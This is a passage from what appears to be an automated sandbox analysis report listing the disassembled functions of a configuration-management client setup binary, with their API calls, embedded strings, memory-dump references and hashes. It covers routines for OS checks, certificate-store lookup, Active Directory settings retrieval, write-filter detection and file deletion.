                                                                                            • Part of subcall function 00576835: __EH_prolog3.LIBCMT ref: 0057683C
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005FBD05: __EH_prolog3_catch_GS.LIBCMT ref: 005FBD0F
                                                                                            • Part of subcall function 005FBD05: GetVersionExW.KERNEL32(?), ref: 005FBD60
                                                                                            • Part of subcall function 005FBD05: GetLastError.KERNEL32 ref: 005FBD6A
                                                                                            • Part of subcall function 005FBD05: GetCurrentThreadId.KERNEL32 ref: 005FBD9D
                                                                                            • Part of subcall function 005F9F49: __EH_prolog3_catch_GS.LIBCMT ref: 005F9F53
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A4484
                                                                                            • Part of subcall function 005AA98E: SysFreeString.OLEAUT32(00000000), ref: 005AA9BA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A44E7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A4537
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A4585
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A4604
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005A4659
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$H_prolog3$ErrorFreeLastStringVersion
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$ALL$CcmGetOSMajorMinorVersion(sOSVersion)$CcmSetupManifest::DetermineSkipApplicability$Check skip platform: Is Embedded.$Check skip platform: Is ServerCore.$CheckCCMSupportedEmbedded(bIsEmbedded, bIsSupported)$H&l$OS check '%s' return positive.$OS=$Skip check positive. Will ignore the pre-req on this machine.$[:Z$d}l$embedded$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$manifest.cpp$sItemValue.tokenize(c_szCommaDelimiter, arrValues)$servercore$spApplicability->get_childNodes(&spSkipList)$spSkip.getText(sItemValue)$spSkipList->get_length(&lLength)
                                                                                          • API String ID: 3123069108-443779355
                                                                                          • Opcode ID: f5c6fe89359b492d61868153fbac0fe023fdb66b9cd57fda3a381e93969aa308
                                                                                          • Instruction ID: 6d66c45eb4487fca4ee54879273250a569630199150f9e2dc33f790b24662fd4
                                                                                          • Opcode Fuzzy Hash: f5c6fe89359b492d61868153fbac0fe023fdb66b9cd57fda3a381e93969aa308
                                                                                          • Instruction Fuzzy Hash: 3AE19970D04359AEDF20EFA4C949BEDBFB5BF56304F144099E548AB282C7B45A08CF61
                                                                                          Function 0063D06A Relevance: 75.6, APIs: 9, Strings: 34, Instructions: 307threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0063D074
                                                                                            • Part of subcall function 005F094C: __EH_prolog3_catch_GS.LIBCMT ref: 005F0956
                                                                                            • Part of subcall function 005F094C: GetCurrentThreadId.KERNEL32 ref: 005F09AC
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063D16C
                                                                                            • Part of subcall function 005F433E: __EH_prolog3_catch.LIBCMT ref: 005F4345
                                                                                            • Part of subcall function 005F433E: GetCurrentThreadId.KERNEL32 ref: 005F439F
                                                                                            • Part of subcall function 005F433E: CoTaskMemFree.OLE32(00000000,00000000,?,?), ref: 005F452E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063D1CD
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063D20F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063D258
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063D2B8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063D321
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063D376
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063D3CE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$FreeH_prolog3H_prolog3_catchTask
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$..\lsexports.cpp$CCM::LocationServices::CcmGetProxyMPFromWMIEx$CCM::LocationServices::LSGetProxyMPFromWMI( sProxyMP, sProtocol, dwVersion, sCapablities)$LocationServices$pdwVersion!=0$ppszCapabilities!=0$ppszProtocol!=0$ppszProxyMP!=0$sCapablities.CoAllocString(&csCapablities)$sProtocol.CoAllocString(&csProtocol)$sProxyMP.CoAllocString(&csProxyMP)
                                                                                          • API String ID: 3364196837-3987164625
                                                                                          • Opcode ID: 30c226c8e30b96815d58e0c956dfa7c30114f6254ae02ee86c1751b301b1d611
                                                                                          • Instruction ID: b7a41b294f7c5e4290e9866c929e34c961adba4fabbfcb3d12d6dfa4a62910ab
                                                                                          • Opcode Fuzzy Hash: 30c226c8e30b96815d58e0c956dfa7c30114f6254ae02ee86c1751b301b1d611
                                                                                          • Instruction Fuzzy Hash: B8C1A070D84358EADB10DBA4CD09BEDBBBABF51704F108189E514AB3C2CBB51A85CB91
                                                                                          Function 00658012 Relevance: 75.5, APIs: 14, Strings: 29, Instructions: 270threadencryptionCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0065801C
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006580A4
                                                                                            • Part of subcall function 0060F930: __EH_prolog3_catch.LIBCMT ref: 0060F937
                                                                                            • Part of subcall function 0060F930: GetCurrentThreadId.KERNEL32 ref: 0060F987
                                                                                          • CertFreeCertificateContext.CRYPT32(?,CCM::Authentication::CCMRetrieveCertificateContextFromIIS,00000178,00656AD7,0093A4B0,0093A540,000000FF,0093A540,000000FF,00000000,CCM::Authentication::CCMGetCurrentServerSigningCertificateContext,00000010,00657D1B,?,00000000,CCM::Authentication::CCMRetrieveCertificateContext), ref: 00658124
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0065816C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006581C9
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0065822C
                                                                                          • CertOpenStore.CRYPT32(0000000A,00000000,00000000,0002C000,?), ref: 006582B8
                                                                                          • GetLastError.KERNEL32 ref: 006582CE
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00658306
                                                                                          • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,00010000,?,00000000), ref: 00658398
                                                                                          • GetLastError.KERNEL32 ref: 006583AE
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006583E6
                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00658482
                                                                                          • CertCloseStore.CRYPT32(00000000,00000000), ref: 0065848E
                                                                                          Strings
                                                                                          • ..\ccmgencert.cpp, xrefs: 006581D5
                                                                                          • CCM::Utility::Security::LookupIISCertStore(sCertStore), xrefs: 00658162
                                                                                          • ..\ccmgencert.cpp, xrefs: 006582F6
                                                                                          • ..\ccmgencert.cpp, xrefs: 006581B9
                                                                                          • 0 != ppCertContext, xrefs: 0065809A
                                                                                          • ..\ccmgencert.cpp, xrefs: 00658238
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0065809F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00658227
                                                                                          • CCM::Authentication::CCMRetrieveCertificateContextFromIIS, xrefs: 00658056
                                                                                          • hCertStoreOfIisCert, xrefs: 006582FC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006581C4
                                                                                          • ..\ccmgencert.cpp, xrefs: 006580B0
                                                                                          • MP signing function CCMRetrieveCertificateContextFromIIS being called in absence of a site role., xrefs: 0065810A
                                                                                          • ..\ccmgencert.cpp, xrefs: 00658178
                                                                                          • Couldn't open cert store %s returned from IIS., xrefs: 00658353
                                                                                          • CCM::Utility::Security::LookupIISCertHash(&cbHash, pbHash), xrefs: 006581BF
                                                                                          • ..\ccmgencert.cpp, xrefs: 006583D6
                                                                                          • ..\ccmgencert.cpp, xrefs: 006583F2
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006583E1
                                                                                          • ..\ccmgencert.cpp, xrefs: 0065815C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00658167
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00658301
                                                                                          • ..\ccmgencert.cpp, xrefs: 00658312
                                                                                          • Couldn't locate IIS certificate., xrefs: 0065841E
                                                                                          • Bytes2ComString(pbHash, cbHash, &pszCertHash), xrefs: 00658222
                                                                                          • Looking for cert with SHA1 hash %s in cert store %s., xrefs: 00658286
                                                                                          • ..\ccmgencert.cpp, xrefs: 00658094
                                                                                          • ..\ccmgencert.cpp, xrefs: 0065821C
                                                                                          • *ppCertContext, xrefs: 006583DC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$Cert$Store$CertificateErrorFreeLast$CloseContextFindH_prolog3H_prolog3_catchH_prolog3_catch_OpenTask
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$*ppCertContext$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$..\ccmgencert.cpp$0 != ppCertContext$Bytes2ComString(pbHash, cbHash, &pszCertHash)$CCM::Authentication::CCMRetrieveCertificateContextFromIIS$CCM::Utility::Security::LookupIISCertHash(&cbHash, pbHash)$CCM::Utility::Security::LookupIISCertStore(sCertStore)$Couldn't locate IIS certificate.$Couldn't open cert store %s returned from IIS.$Looking for cert with SHA1 hash %s in cert store %s.$MP signing function CCMRetrieveCertificateContextFromIIS being called in absence of a site role.$hCertStoreOfIisCert
                                                                                          • API String ID: 1018407097-3019467137
                                                                                          • Opcode ID: cf3324309c48abafed718c3668dd397ac24d7228f84245e1526e73c687d4a752
                                                                                          • Instruction ID: 1a219510255fcbd852b41fe75443dae18258445b6620282703e1d1773347719a
                                                                                          • Opcode Fuzzy Hash: cf3324309c48abafed718c3668dd397ac24d7228f84245e1526e73c687d4a752
                                                                                          • Instruction Fuzzy Hash: D4A19F71940329AEDB21AF608C4ABEE7AB9FB14705F0440D5F948B7381DBB54B89CF91
                                                                                          Function 00643299 Relevance: 73.9, APIs: 8, Strings: 34, Instructions: 351threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 006432A3
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00609791: __EH_prolog3.LIBCMT ref: 00609798
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00643394
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006433EF
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0064343E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00643561
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006435F0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00643671
                                                                                            • Part of subcall function 00640521: __EH_prolog3_catch_GS.LIBCMT ref: 00640528
                                                                                            • Part of subcall function 00640521: GetCurrentThreadId.KERNEL32 ref: 00640638
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006434E2
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                            • Part of subcall function 0060A27B: __EH_prolog3.LIBCMT ref: 0060A282
                                                                                          Strings
                                                                                          • Failed to retrieve an FSP from AD., xrefs: 006436B1
                                                                                          • ..\lsad.cpp, xrefs: 00643661
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00643439
                                                                                          • ..\lsad.cpp, xrefs: 0064342E
                                                                                          • g_oMPsCache.GetClientOperationalSettings( sSiteCode, sOperationalXML ), xrefs: 0064338A
                                                                                          • Received client operational settings: %s., xrefs: 00643482
                                                                                          • parentElement.HasChild(sVersionTag), xrefs: 00643557
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006434DD
                                                                                          • true == doc.LoadFromString(sOperationalXML), xrefs: 00643434
                                                                                          • !sSiteVersion.empty(), xrefs: 006435E6
                                                                                          • Version, xrefs: 006434A3
                                                                                          • ..\lsad.cpp, xrefs: 006434EE
                                                                                          • ..\lsad.cpp, xrefs: 006435FC
                                                                                          • Failed to retrieve an CLIENT.MSI settings from AD., xrefs: 006436FD
                                                                                          • ..\lsad.cpp, xrefs: 006435E0
                                                                                          • Retrieving client operational settings from AD., xrefs: 00643345
                                                                                          • parentElement, xrefs: 006434D8
                                                                                          • ..\lsad.cpp, xrefs: 0064356D
                                                                                          • ..\lsad.cpp, xrefs: 006433F7
                                                                                          • CCM::LocationServices::LSGetClientDeploymentInfoFromAD, xrefs: 006432E7
                                                                                          • ..\lsad.cpp, xrefs: 00643679
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006433EA
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006435EB
                                                                                          • ..\lsad.cpp, xrefs: 0064339C
                                                                                          • ..\lsad.cpp, xrefs: 006434D2
                                                                                          • false == sOperationalXML.empty(), xrefs: 006433E5
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0064355C
                                                                                          • ..\lsad.cpp, xrefs: 00643446
                                                                                          • ConstructSecuritySettingsFromClientOperationalSettings( doc, oSecurityMode ), xrefs: 00643667
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0064338F
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0064366C
                                                                                          • ..\lsad.cpp, xrefs: 00643384
                                                                                          • ..\lsad.cpp, xrefs: 00643551
                                                                                          • ..\lsad.cpp, xrefs: 006433DF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catch_
                                                                                          • String ID: !sSiteVersion.empty()$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$CCM::LocationServices::LSGetClientDeploymentInfoFromAD$ConstructSecuritySettingsFromClientOperationalSettings( doc, oSecurityMode )$Failed to retrieve an CLIENT.MSI settings from AD.$Failed to retrieve an FSP from AD.$Received client operational settings: %s.$Retrieving client operational settings from AD.$Version$false == sOperationalXML.empty()$g_oMPsCache.GetClientOperationalSettings( sSiteCode, sOperationalXML )$parentElement$parentElement.HasChild(sVersionTag)$true == doc.LoadFromString(sOperationalXML)
                                                                                          • API String ID: 2734623419-2978586501
                                                                                          • Opcode ID: f2cb0f6cd3bcb83b4bceee3cabc2f18129d45570710c39b7a84d7b9f182afcb1
                                                                                          • Instruction ID: b8c9e4183087c4cf52a3a203f212b2e54023da53af72e2b6c76dc058ade4094a
                                                                                          • Opcode Fuzzy Hash: f2cb0f6cd3bcb83b4bceee3cabc2f18129d45570710c39b7a84d7b9f182afcb1
                                                                                          • Instruction Fuzzy Hash: DCD1C271944358AADF11EBA0CD4ABEE7B7ABF91704F144049F514BB3C2CB785A05CBA1
                                                                                          Function 005B5355 Relevance: 65.1, APIs: 5, Strings: 32, Instructions: 327threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005B535F
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 005B14FC: __EH_prolog3.LIBCMT ref: 005B1503
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00603360: __EH_prolog3_catch_GS.LIBCMT ref: 00603367
                                                                                            • Part of subcall function 00603360: GetCurrentThreadId.KERNEL32 ref: 006033F8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B5431
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B54F5
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B559D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B5724
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • util.cpp, xrefs: 005B543D
                                                                                          • util.cpp, xrefs: 005B5730
                                                                                          • UWF_Filter.Id="UWF_Filter", xrefs: 005B54B1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B571F
                                                                                          • "m, xrefs: 005B57F4
                                                                                          • UWF is not enabled in this session., xrefs: 005B5618
                                                                                          • spNamespace.Open( szEmbeddedNamespace), xrefs: 005B5427
                                                                                          • spNamespace.Query( sQuery.c_str(), &spEnum), xrefs: 005B571A
                                                                                          • util.cpp, xrefs: 005B5714
                                                                                          • SELECT * FROM UWF_VOLUME WHERE Protected = TRUE AND CurrentSession = TRUE AND DriveLetter = "%s", xrefs: 005B56BD
                                                                                          • util.cpp, xrefs: 005B54E5
                                                                                          • UWF: Failed to read %s property from UWF_Filter instance. Unable to determine if UWF protection is enabled. HRESU, xrefs: 005B55DB
                                                                                          • spFilterInstance.GetBoolean( szCurrentEnabledProperty, bCurrentEnabled), xrefs: 005B5593
                                                                                          • spNamespace.Get( szFilterInstance, &spFilterInstance), xrefs: 005B54EB
                                                                                          • util.cpp, xrefs: 005B558D
                                                                                          • util.cpp, xrefs: 005B5421
                                                                                          • UWF: Checking if volume '%s' is protected, xrefs: 005B569D
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B542C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B54F0
                                                                                          • UWF: Query for protected volume failed. HRESULT=0x%0x. Query string: %s, xrefs: 005B5769
                                                                                          • util.cpp, xrefs: 005B5501
                                                                                          • CurrentEnabled, xrefs: 005B555D, 005B55D6
                                                                                          • m, xrefs: 005B5753
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B5598
                                                                                          • UWF: Unable to open WMI namespace, "%s". HRESULT = 0x%0x, xrefs: 005B5475
                                                                                          • UWF: Failed to get UWF_Filter instance. Unable to determine if UWF protection is enabled. HRESULT=0x%0x, xrefs: 005B553D
                                                                                          • 4 m, xrefs: 005B57A9
                                                                                          • util.cpp, xrefs: 005B55A9
                                                                                          • DetectUWF, xrefs: 005B53C6
                                                                                          • UWF: Write filter is enabled on volume %s., xrefs: 005B57BE
                                                                                          • UWF: Filter is enabled, but volume '%s' is not protected, xrefs: 005B5803
                                                                                          • root\standardcimv2\embedded, xrefs: 005B53ED, 005B5470
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catch_
                                                                                          • String ID: m$ "m$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$4 m$CurrentEnabled$DetectUWF$SELECT * FROM UWF_VOLUME WHERE Protected = TRUE AND CurrentSession = TRUE AND DriveLetter = "%s"$UWF is not enabled in this session.$UWF: Checking if volume '%s' is protected$UWF: Failed to get UWF_Filter instance. Unable to determine if UWF protection is enabled. HRESULT=0x%0x$UWF: Failed to read %s property from UWF_Filter instance. Unable to determine if UWF protection is enabled. HRESU$UWF: Filter is enabled, but volume '%s' is not protected$UWF: Query for protected volume failed. HRESULT=0x%0x. Query string: %s$UWF: Unable to open WMI namespace, "%s". HRESULT = 0x%0x$UWF: Write filter is enabled on volume %s.$UWF_Filter.Id="UWF_Filter"$root\standardcimv2\embedded$spFilterInstance.GetBoolean( szCurrentEnabledProperty, bCurrentEnabled)$spNamespace.Get( szFilterInstance, &spFilterInstance)$spNamespace.Open( szEmbeddedNamespace)$spNamespace.Query( sQuery.c_str(), &spEnum)$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 2734623419-3512755065
                                                                                          • Opcode ID: a156711a7ca0527b6bd8b0caf30435cf62ccad8ce375d6ad14f1f6430079945d
                                                                                          • Instruction ID: 790864ccd1b60a14b5acae6941dd34aa32128718ebc866da9ddd4ecb593b6944
                                                                                          • Opcode Fuzzy Hash: a156711a7ca0527b6bd8b0caf30435cf62ccad8ce375d6ad14f1f6430079945d
                                                                                          • Instruction Fuzzy Hash: F9D1A070D41259EAEB24DB64CD5AFEDBBB9BF51304F108099E545B7282DBB01B88CF21
                                                                                          Function 0057E0D8 Relevance: 65.0, APIs: 13, Strings: 24, Instructions: 202threadfileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0057E0E2
                                                                                          • DeleteFileW.KERNEL32(?,CcmSetup::DeleteFileW), ref: 0057E12F
                                                                                          • GetLastError.KERNEL32 ref: 0057E191
                                                                                          • GetLastError.KERNEL32 ref: 0057E1CA
                                                                                          • GetTempFileNameW.KERNEL32(?,DEL,00000000,?,?,?,?,?,?,0000025C), ref: 0057E208
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,0000025C), ref: 0057E212
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057E24F
                                                                                          • MoveFileExW.KERNEL32(?,?,00000009,?,?,?,?,?,0000025C), ref: 0057E275
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,0000025C), ref: 0057E283
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057E2BB
                                                                                          • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,?,0000025C), ref: 0057E321
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,0000025C), ref: 0057E32F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057E368
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • Successfully renamed %s to %s and queued for deletion on reboot., xrefs: 0057E3EC
                                                                                          • CcmSetup::DeleteFileW, xrefs: 0057E113
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057E2B6
                                                                                          • G), xrefs: 0057E3DA
